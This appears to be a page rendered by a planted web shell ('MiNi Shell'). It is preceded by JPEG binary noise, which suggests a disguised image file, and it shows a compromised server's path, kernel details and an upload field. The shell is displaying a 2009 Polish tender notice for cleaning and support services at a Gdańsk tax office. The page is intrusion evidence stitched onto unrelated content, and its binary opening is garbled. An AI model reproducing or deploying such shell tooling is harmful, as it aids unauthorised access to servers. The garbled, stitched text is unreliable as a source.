JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/26066-N-2009.html

<p class="kh_header"><b>Gdańsk: utrzymanie czystości i prace pomocnicze w siedzibie Trzeciego Urzędu Skarbowego w Gdańsku przy ulicy Żaglowej 2.</b><br>
<b>Numer ogłoszenia: 26066 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Trzeci Urząd Skarbowy w Gdańsku , ul. Żaglowa 2, 80-560 Gdańsk, woj. pomorskie, tel. 058 3464346 w. 194, faks 058 3464123.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> utrzymanie czystości i prace pomocnicze w siedzibie Trzeciego Urzędu Skarbowego w Gdańsku przy ulicy Żaglowej 2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest usługa utrzymania czystości (powierzchni poziomych i pionowych) w budynku Trzeciego Urzędu Skarbowego w Gdańsku i na terenie posesji oraz w dwóch pomieszczeniach archiwum zakładowego przy ul. Żaglowej 2 znajdujących się w odrębnym budynku i prace pomocnicze w Trzecim Urzędzie Skarbowym przy ul. Żaglowej 2. Zakres prac:
1)Utrzymanie w czystości pomieszczeń w budynku w dni robocze. Do zadań osoby sprzątającej należy w szczególności:
codzienne czyszczenie powierzchni podłogowych poprzez ich odkurzanie, zamiatanie i mycie,
codzienne zamiatanie i mycie podłóg zmywalnych środkami nabłyszczającymi,
codzienne wycieranie kurzu z mebli biurowych, 
codzienne opróżnianie koszy na śmieci, czyszczenie pojemników na śmieci, wymiana worków 
i wynoszenie worków ze śmieciami do pojemnika znajdującego się na zewnątrz budynku,
codzienne mycie i dezynfekcja sedesów,
codzienne mycie i dezynfekcja podłóg w sanitariatach,
codzienne mycie umywalek, armatury i luster,
codzienne odkurzanie i czyszczenie wykładzin dywanowych przy pomocy odpowiednich urządzeń i środków czyszczących,
codzienne mycie szyb pionowych nad ladami na salach obsługi klienta, 
codzienne szczególne utrzymywanie czystości na salach obsługi klienta,
codzienne sprzątanie schodów i podjazdów dla niepełnosprawnych przed wejściami do budynku,
codzienne sprzątanie dwóch przeszklonych wiatrołapów,
codzienne czyszczenie i wycieranie na mokro drzwi, glazury, parapetów, listew ściennych, poręczy, schodów,
jeden raz w tygodniu odkurzanie mebli tapicerowanych we wszystkich pomieszczeniach,
jeden raz w miesiącu czyszczenie opraw lamp oświetleniowych we wszystkich pomieszczeniach,
jeden raz w miesiącu czyszczenie żaluzji poziomych i pionowych we wszystkich pomieszczeniach,
jeden raz w miesiącu odkurzanie grzejników centralnego ogrzewania we wszystkich pomieszczeniach,
raz do roku odkurzanie ścian,
dwa razy w roku (w odstępach przynajmniej 5-cio miesięcznych),a w razie potrzeb na bieżąco pranie wykładzin podłogowych,
bieżące umieszczanie odświeżaczy powietrza w pomieszczeniach sanitarnych oraz środków dezynfekujących w muszlach klozetowych,
bieżące umieszczanie papieru toaletowego w papiernicach. Papier toaletowy w dużych rolkach (średnica - 20 cm, szer. 9 cm) powinien posiadać atest Państwowego Zakładu Higieny, 
bieżące uzupełnianie dozowników na mydło w płynie. Mydło powinno posiadać atest PZH oraz zawierać składniki równoważące poziom nawilżania i natłuszczania skóry, 
bieżące utrzymanie czystości na korytarzach,
kompleksowe sprzątanie archiwum zakładowego raz na trzy miesiące - pow. 363 m2,  
mycie okien trzy razy w roku (kwiecień, lipiec, październik) w budynku Trzeciego Urzędu Skarbowego. Przez mycie okien należy rozumieć umycie szyb, ram okiennych i parapetów oraz żaluzji. Do mycia okien Wykonawca użyje własnego sprzętu oraz własnych środków czystości.
Ilość okien oraz ich powierzchnia do mycia:
okna o wymiarach   80 x   80 cm		szt. 23
okna o wymiarach 110 x 110 cm 		szt.   6
okna o wymiarach 200 x 140 cm 		szt. 88

2)Prace pomocnicze polegające na obsłudze centrali telefonicznej w urzędzie codziennie w dni robocze (praca przewidziana dla pracownika zatrudnionego na jednym pełnym etacie) w godzinach od 7.30 do 15.30.
3)Prace pomocnicze polegające na obsłudze trzech kserokopiarek codziennie w dni robocze w godzinach od 7.30 do 15.30 (praca przewidziana dla pracownika zatrudnionego na jednym pełnym etacie).
4)Prace pomocnicze polegające na wykonywaniu następujących prac, codziennie w dni robocze (praca przewidziana dla pracownika zatrudnionego na jednym pełnym etacie),:
konserwatorsko - naprawczych (np. naprawy hydrauliczne, drobne naprawy mebli biurowych) oraz obsługa/ naprawa urządzeń elektrycznych w godzinach od 7.30 do 15.30 - (uprawnienia SEP),
pielęgnacja terenu zieleni wokół budynku oraz utrzymanie jego w czystości (strzyżenie trawników, pielęgnacja krzewów i kwietników) - pow.  2805 m2,
odśnieżanie chodników, drogi dojazdowej oraz miejsc parkingowych - pow.  1.417 m2,
w okresie zimowym posypywanie chodników i schodów zewnętrznych oraz podjazdów dla niepełnosprawnych mieszanką kruszywa (piasek z solą) w sposób zapewniający bezpieczne poruszanie się klientów i pracowników urzędu, 
w miarę potrzeb pomoc przy rozładunku druków i przy wywożeniu akt do archiwum zakładowego znajdującego się w odrębnym budynku,
zgłaszanie na bieżąco kierownikowi Referatu ds. Ogólnych, Kadr i Szkolenia awarii 
w budynku urzędu i zgłaszanie zapotrzebowania na zakup zużytych akcesoriów np. żarówek, kłódek, klamek itp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4, 90.91.13.00-9, 64.21.42.00-1, 71.35.60.00-8, 77.30.00.00-3, 77.31.41.00-5, 77.34.20.00-9, 90.91.40.00-7, 90.62.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków, o których mowa w pkt V SIWZ Zamawiający żąda od Wykonawców złożenia następujących dokumentów:
a)wypełniony, podpisany i opieczętowany druk formularza oferty stanowiący Załącznik Nr 1 do SIWZ,
b)wypełniony, podpisany i opieczętowany druk oświadczenia stanowiący Załącznik Nr 2 do SIWZ (w przypadku, gdy Wykonawcy występują wspólnie druk złoży i podpisze osobno każdy z Wykonawców),
c)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku, gdy Wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z Wykonawców, dokumenty potwierdza za zgodność z oryginałem Pełnomocnik zgodnie z art. 23 ustawy). 
W przypadku spółki cywilnej Zamawiający żąda złożenia aktualnych zaświadczeń od właściwego naczelnika urzędu skarbowego i oddziału Zakładu Ubezpieczeń Społecznych wystawionych na każdego ze wspólników osobno oraz na spółkę. Jeżeli wspólnikami są różne podmioty prawa cywilnego, np. osoby fizyczne, osoby prawne oraz handlowe spółki osobowe, to należy złożyć ww. dokumenty odpowiednio, 
d)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku, gdy Wykonawcy występują wspólnie stosowny dokument dostarczy każdy z Wykonawców, dokument potwierdza za zgodność z oryginałem Pełnomocnik zgodnie z art. 23 ustawy),
W przypadku spółki cywilnej Zamawiający żąda złożenia aktualnych zaświadczeń o wpisie do ewidencji działalności gospodarczej na każdego ze wspólników osobno oraz umowę spółki. Jeżeli wspólnikami są różne podmioty prawa cywilnego, np. osoby fizyczne, osoby prawne oraz handlowe spółki osobowe, to należy złożyć ww. dokumenty odpowiednio,
e)Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (w przypadku, gdy Wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z Wykonawców).
Dokumenty potwierdza za zgodność z oryginałem Pełnomocnik zgodnie z art. 23 ustawy.
f)oryginał pełnomocnictwa lub kopię poświadczoną notarialnie Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ust. 2  ustawy. Pełnomocnictwo musi wskazywać Pełnomocnika, musi wymieniać wszystkich Wykonawców wspólnie ubiegających się o zamówienie oraz każdy z tych Wykonawców musi potwierdzić podpisem ustanowienie pełnomocnictwa zgodnie z pkt. X SIWZ (włącznie z podpisem podmiotu umocowanego na podstawie pełnomocnictwa, jeżeli jest on jednym z Wykonawców wspólnie ubiegających się o udzielenie zamówienia).
Ponadto Pełnomocnictwo w szczególności powinno wskazywać czy dotyczy:
1.reprezentowania wszystkich Wykonawców w postępowaniu i zawarcia umowy o zamówienie publiczne w ich imieniu,
2.tylko reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia.
W przypadku spółek cywilnych należy dołączyć umowę spółki cywilnej, w której będą dane o sposobie reprezentacji spółki na zewnątrz. Zgodnie z art. 141 ustawy Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie wniesienie zabezpieczenia należytego wykonania umowy.
g)Wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcom sporządzony na druku stanowiącym Załącznik Nr 3 do SIWZ. 
h)wypełniony, podpisany i opieczętowany druk formularza cenowego stanowiący Załącznik nr 5 do SIWZ
i)Wykaz wykonywanych w okresie ostatnich 3 lat usług odpowiadających przedmiotowi zamówienia (tj. od 1 lutego 2006r. do 31 stycznia 2009r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, powierzchni biurowej w m2 w obiektach typu biurowo - administracyjnego, dat wykonania zamówienia (data rozpoczęcia i zakończenia zamówienia) i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie (np. referencji. Usługi wymienione w wykazie winny być świadczone przez okres nie krótszy niż 6 miesięcy w okresie od 1 lutego 2006 r. do 31 stycznia 2009 r. 
Zamawiający uzna warunek za spełniony jeżeli co najmniej trzy wykazane usługi utrzymania czystości spełnią następujące warunki:
1.będą świadczone w obiektach typu biurowo - administracyjnego o powierzchni nie mniejszej niż 800 m2 każdy,
2.będą świadczone przez okres nie krótszy niż 6 miesięcy w okresie od 1 lutego 2006 r. do 31 stycznia 2009 r.,
3.zostaną załączone dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.is.gdansk.pl - link urzędy skarbowe - zakładka zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Trzeci Urząd Skarbowy w Gdańsku Ul. Żaglowa 2, 80-560 Gdańsk, pokój nr 07.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 10:00, miejsce: budynek Trzeciego Urzędu Skarbowego w Gdańsku przy ul. Żaglowej 2, 80-560 Gdańsk, pok. nr 101 (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com